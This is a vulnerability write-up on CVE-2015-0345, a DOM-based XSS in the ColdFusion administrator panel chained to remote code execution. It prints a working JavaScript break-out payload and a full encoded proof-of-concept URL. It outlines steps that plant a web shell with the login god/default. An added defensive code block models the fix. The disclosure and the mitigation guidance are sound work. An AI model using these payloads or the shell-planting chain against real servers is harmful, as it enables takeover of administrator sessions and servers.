ColdFusion explosion: chain reaction from XSS to RCE


While auditing the Management Panel of ColdFusion 10 and 11, I found a DOM-based cross-site scripting vulnerability. In this article I will show how this vulnerability can be used to obtain remote code execution on the ColdFusion application server.

After discovering this vulnerability, I disclosed the full details to the Adobe security team. The vulnerability was assigned CVE-2015-0345.
Install the patches for the ColdFusion Management Panel to fix the vulnerability, and make sure the management panel is not exposed.

Note: This vulnerability can only be exploited against users who have authenticated to the Management Panel. Remote code execution via the exploit recorded below therefore requires an authenticated administrator to execute the final XSS vector.

Vulnerability Analysis

The ColdFusion Management Panel is the core interface for configuring the service. It covers, among other things, user management, database configuration and server management. When a Management page needs to browse and display files or directories dynamically, it uses the JavaScript library jqFileTree.js together with a server-side API.

The jqFileTree.js library can be seen in use on the following Management page:
/CFIDE/administrator/filedialog/index.cfm?type=dir&fromjscript=true&dialogStyle=selectDirectory&formelem=ORMSearchIndexDirectory&defaultPath=

Figure: FileTree, the ColdFusion API that lists the file and folder paths on the system.

The list of file and folder paths that this Ajax API returns can be accessed directly at the following URL:
/CFIDE/administrator/ajaxtree/jqueryFileTree.cfm?type=dir

Putting the two together, we can see the path that the page's JavaScript requests.


ColdFusion implements this feature in JavaScript: it calls the fileTree function, which uses the Ajax API to fetch all files and folders. fileTree parses the API response, and the returned files and folders are added to the pathbox user interface shown in the first figure. ColdFusion executes the following JavaScript:

$('#fileTreeDemo_1').fileTree({script:'../../administrator/ajaxtree/jqueryFileTree.cfm?type=dir',expanded: '\x2F'}, function(file) {path = file;document.getElementById("pathbox").value = path;});

The interesting part of this script is that the path passed to the file tree is not hard-coded: it is placed into the JavaScript context when the page loads, and it is generated dynamically from the URL the user entered.

The string is inserted into the page's HTML source by the server-side ColdFusion script, not by the client. The value inserted into the JavaScript above is:
'../../administrator/ajaxtree/jqueryFileTree.cfm?type=dir'

The "?type=dir" portion of that string comes from the user-supplied URL, so it must be treated as user input.

After some testing, I found that the "type" parameter is not correctly encoded for the JavaScript context.

With ColdFusion's cross-site scripting filter and special-character encoding enabled, traditional XSS vectors are useless: tags and angle brackets (> and <) are encoded.
The best option is therefore to craft a payload that works entirely within the JavaScript context.

XSS proof of concept

After some tinkering, I constructed the following payload to trigger a prompt showing document.location:
',expanded:'\x2F'},function(file){path = file;document.getElementById("pathbox").value = path;});prompt(document.location);$('#fileTreeDemo_1').fileTree({script:'../../administrator/ajaxtree/jqueryFileTree.cfm?type=dir

The payload closes off the existing function call and then executes the injected JavaScript; in this example the injected code is prompt(document.location).

The remainder of the payload re-creates the correct fileTree configuration so that the ColdFusion file/folder browser keeps working normally on the page, which makes the target less likely to notice anything.
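As an added example (not code from the article or from ColdFusion), the following JavaScript models the encoding mistake described above: the server emits the fileTree() call with the user-controlled type value inside a JavaScript string literal, and an HTML-oriented filter cannot stop a single quote from closing that literal. The template strings, the htmlEncode model and the allow-list are assumptions; the payload is the one decoded from the page's own PoC URL.

```javascript
// Added example (not code from the article or from ColdFusion): a simplified model of the
// flaw, with the server splicing the user-controlled "type" value into a JS string literal.
const TEMPLATE_PREFIX = String.raw`$('#fileTreeDemo_1').fileTree({script:'../../administrator/ajaxtree/jqueryFileTree.cfm?type=`;
const TEMPLATE_SUFFIX = String.raw`',expanded: '\x2F'}, function(file) {path = file;document.getElementById("pathbox").value = path;});`;

// The article's payload, URL-decoded from the PoC URL on the page.
const PAYLOAD = String.raw`',expanded:'\x2F'},function(file){path = file;document.getElementById("pathbox").value = path;});prompt(document.location);$('#fileTreeDemo_1').fileTree({script:'../../administrator/ajaxtree/jqueryFileTree.cfm?type=dir`;

// Assumed model of an HTML-only filter: it neutralises tags and angle brackets but
// leaves the single quote alone, which is all a JS-string break-out needs.
function htmlEncode(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

// Vulnerable: encodes for the HTML context although the value lands in a JS string.
function renderVulnerable(type) {
  return TEMPLATE_PREFIX + htmlEncode(type) + TEMPLATE_SUFFIX;
}

// Fix 1: encode for the JavaScript string context. Every non-alphanumeric UTF-16 unit
// becomes a \xHH or \uHHHH escape, so the value can never close the string literal.
function jsStringEncode(s) {
  let out = '';
  for (let i = 0; i < s.length; i++) {
    const c = s.charCodeAt(i);
    if (/[A-Za-z0-9]/.test(s[i])) out += s[i];
    else if (c <= 0xff) out += '\\x' + c.toString(16).padStart(2, '0');
    else out += '\\u' + c.toString(16).padStart(4, '0');
  }
  return out;
}

function renderFixed(type) {
  return TEMPLATE_PREFIX + jsStringEncode(type) + TEMPLATE_SUFFIX;
}

// Fix 2: reject anything outside the handful of values the parameter legitimately takes,
// before it reaches the template (allow-list is assumed; the article only shows 'dir').
const ALLOWED_TYPES = new Set(['dir', 'file']);
function renderAllowListed(type) {
  if (!ALLOWED_TYPES.has(type)) throw new Error('rejected type parameter: ' + type);
  return TEMPLATE_PREFIX + type + TEMPLATE_SUFFIX;
}

// Defender's check on the rendered page: a legitimate render contains exactly one
// fileTree() call; a successful break-out of the string literal produces a second one.
function countFileTreeCalls(js) {
  return (js.match(/\.fileTree\(/g) || []).length;
}
```

Running countFileTreeCalls over the vulnerable and fixed renders of the same payload shows two calls versus one, which is the difference between HTML-context and JavaScript-context encoding.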

URL-encoded and substituted for the value of the type parameter in the original URL, the payload becomes:

http://127.0.0.1:8500/CFIDE/administrator/filedialog/index.cfm?type=dir%27%2c%65%78%70%61%6e%64%65%64%3a%27%5c%78%32%46%27%7d%2c%66%75%6e%63%74%69%6f%6e%28%66%69%6c%65%29%7b%70%61%74%68%20%3d%20%66%69%6c%65%3b%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%74%68%62%6f%78%22%29%2e%76%61%6c%75%65%20%3d%20%70%61%74%68%3b%7d%29%3b%70%72%6f%6d%70%74%28%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%29%3b%24%28%27%23%66%69%6c%65%54%72%65%65%44%65%6d%6f%5f%31%27%29%2e%66%69%6c%65%54%72%65%65%28%7b%73%63%72%69%70%74%3a%27%2e%2e%2f%2e%2e%2f%61%64%6d%69%6e%69%73%74%72%61%74%6f%72%2f%61%6a%61%78%74%72%65%65%2f%6a%71%75%65%72%79%46%69%6c%65%54%72%65%65%2e%63%66%6d%3f%74%79%70%65%3d%64%69%72&fromjscript=true&dialogStyle=selectDirectory&formelem=ORMSearchIndexDirectory&defaultPath=


When the target visits the URL above, the injected JavaScript, prompt(document.location); in this example, executes in the browser, as the following figure shows:


Proof of XSS to RCE

I created two payloads for the affected system. The first sends a request that disables the password on the ColdFusion Management Panel; the second uploads a web backdoor shell.

To keep this article focused, I will concentrate on the more practical one.

Both payloads can be found on my GitHub.

Payload

Payload #2 (available on GitHub, as mentioned above) performs the following steps to upload the shell once an administrator executes it:

1. Sends a GET request to a CFIDE Management page to obtain the CSRF token.

2. Sends a POST request to /CFIDE/administrator/scheduler/scheduleedit.cfm with the parameters required for the submission.

3. The task added by that POST request uploads a CFML shell to /CFIDE/update_cf.log.

4. Sends a POST request that changes the 404 and 500 error templates to execute /CFIDE/update_cf.log.

Once the payload has run successfully, the ColdFusion shell can be reached at /404.cfm, /500.cfm, or by triggering a 404 or 500 error.

For debugging, the payload logs the CSRF token, the full ColdFusion installation path, and the location from which the shell executes. The following figure shows the JavaScript console after the administrator runs the PoC:


Visiting /404.cfm or /500.cfm returns the login page of the backdoor shell. The shell is configured with the login name god and the password default. After logging in, one can execute commands, run SQL queries, edit files, and upload or download files from the server. The backdoor interface is shown here:


Once an attacker has the shell, they can pivot into the internal network and escalate their privileges to obtain further access.

Conclusion

Adobe fixed the DOM-based XSS vulnerability on March 26. Thanks to the Adobe security team for their quick response.

When deploying applications, following the vendor's guidelines is very important, and this ColdFusion vulnerability is a good example. Follow Adobe's best practices and make sure the ColdFusion Management Panel is not reachable from the outside. If you don't, be prepared for the next patch.
